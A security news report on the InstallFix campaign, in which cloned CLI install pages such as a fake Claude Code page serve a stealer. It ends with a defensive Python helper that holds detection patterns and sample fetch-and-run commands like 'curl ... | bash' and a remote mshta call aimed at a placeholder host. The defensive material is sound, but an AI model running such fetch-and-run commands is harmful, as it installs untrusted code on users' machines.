Cybersecurity researchers have discovered a new social engineering attack called InstallFix that tricks users into running malicious commands while pretending to install legitimate command-line tools.

The attack is a variation of the ClickFix technique and targets developers and users who often install software using quick command-line instructions copied from the internet.

Researchers from Push Security found that attackers create fake installation pages for popular command-line interface tools. These pages closely copy the design, branding, and documentation layout of the real websites, making them difficult to distinguish from the legitimate versions.

One example highlighted in the report involved a cloned installation page for Claude Code, a CLI coding assistant developed by Anthropic. The fake page looked almost identical to the real documentation site, including its layout and sidebar links.

However, the installation commands for macOS and Windows were modified to run malicious scripts instead of the real software installer. When users copy and execute those commands in their terminal, malware is silently downloaded from attacker-controlled servers.

The attack takes advantage of a common developer habit known as “curl to bash,” where users download and run scripts directly from the internet using a single command without reviewing the code.

According to the researchers, the fake sites are promoted through malicious advertising campaigns on Google Search. When users search for phrases like “Claude Code install” or “Claude Code CLI,” sponsored results may lead them to the malicious clone instead of the official website.

Investigations by BleepingComputer confirmed that some of these fake pages are still appearing in sponsored search results. One example used a Squarespace-hosted website that perfectly mirrored the official Claude Code documentation.

The malware delivered in these attacks is known as Amatera Stealer, a data-stealing program designed to extract sensitive information from infected systems. It can target browser passwords, session tokens, cookies, cryptocurrency wallets, and other stored credentials.

On macOS systems, the malicious command uses encoded instructions to download and run a hidden binary file from an attacker-controlled domain. For Windows systems, the attack uses the built-in utility mshta.exe to retrieve the malware and launch additional processes that help execute the payload.

Security researchers believe Amatera Stealer is based on another malware family called ACR Stealer and is distributed as a malware-as-a-service platform that cybercriminals can subscribe to.

The campaign is also difficult to detect because the malicious sites are often hosted on legitimate platforms such as Cloudflare Pages, Squarespace, and Tencent EdgeOne.

Researchers warn that as more non-technical users begin working with developer-style tools, attacks like InstallFix could become more common.


Users are advised to avoid clicking sponsored search results when downloading developer tools, verify installation instructions on official websites, and bookmark trusted download pages to prevent falling for fake installation guides.
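The "curl to bash" habit described above and the advice to verify installation instructions both come down to one change of workflow: never let a copied one-liner execute remote content directly, and check what was downloaded against a checksum published by the vendor before running it. The following Python helper is an added example written for this article; it is not code from Push Security, BleepingComputer, or Anthropic. The pattern names, the `example.invalid` URLs in the constructed sample commands, and the installer bytes it stages are all hypothetical. It flags the three command shapes the article mentions (output piped straight into a shell, decoded text piped into a shell, and `mshta.exe` fetching a remote file), then shows the download-then-verify step that should replace them.

```python
"""Defensive helper for the "curl to bash" habit: flag install one-liners
that execute remote content without a review step, and verify a staged
installer against a vendor-published SHA-256 before it is run."""
import hashlib
import hmac
import os
import tempfile

import re

# Command shapes that run whatever the server returns. The pattern names are
# labels chosen for this example, not an established taxonomy.
RISKY_PATTERNS = {
    # curl/wget output piped straight into a shell
    "pipe-to-shell": re.compile(
        r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(bash|sh|zsh)\b"),
    # decoded text piped into a shell, which hides what will actually run
    "encoded-exec": re.compile(
        r"base64\s+(-d|-D|--decode)[^|]*\|\s*(sudo\s+)?(bash|sh|zsh)\b"),
    # mshta.exe pulling a remote HTA (Windows)
    "mshta-remote": re.compile(r"\bmshta(\.exe)?\s+\S*://", re.IGNORECASE),
}


def risky_patterns(command: str) -> list:
    """Return the names of every risky pattern found in an install command."""
    return [name for name, rx in RISKY_PATTERNS.items() if rx.search(command)]


def sha256_of(path: str) -> str:
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_staged_installer(path: str, expected_sha256: str) -> bool:
    """Compare a downloaded installer with a checksum obtained from the
    vendor's own site, never from the page that served the download."""
    return hmac.compare_digest(sha256_of(path), expected_sha256.lower())


def demo() -> dict:
    """Run the checks over constructed input and return the outcomes."""
    # Constructed sample commands; example.invalid never resolves.
    commands = [
        "curl -fsSL https://example.invalid/install.sh | bash",
        "curl -fsSL -o install.sh https://example.invalid/install.sh",
        "mshta https://example.invalid/setup.hta",
    ]
    flagged = {c: risky_patterns(c) for c in commands}

    # Constructed installer bytes standing in for a downloaded script, and the
    # checksum a vendor would publish for exactly those bytes.
    installer = b"#!/bin/sh\necho 'constructed installer'\n"
    published = hashlib.sha256(installer).hexdigest()

    fd, path = tempfile.mkstemp(suffix=".sh")
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(installer)
        verified_clean = verify_staged_installer(path, published)

        # Simulate a swapped installer: one extra line changes the digest.
        with open(path, "ab") as f:
            f.write(b"echo 'appended by a tampered mirror'\n")
        tampered_rejected = not verify_staged_installer(path, published)
    finally:
        os.unlink(path)

    return {
        "flagged": flagged,
        "verified_clean": verified_clean,
        "tampered_rejected": tampered_rejected,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The download-only form (`curl -o install.sh ...`) is not flagged because it leaves a file on disk that can be read and hashed before anything executes; the checksum used in `verify_staged_installer` has to come from the vendor's documentation reached via a bookmarked or typed address, since a cloned page can publish a matching checksum for its own modified script.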
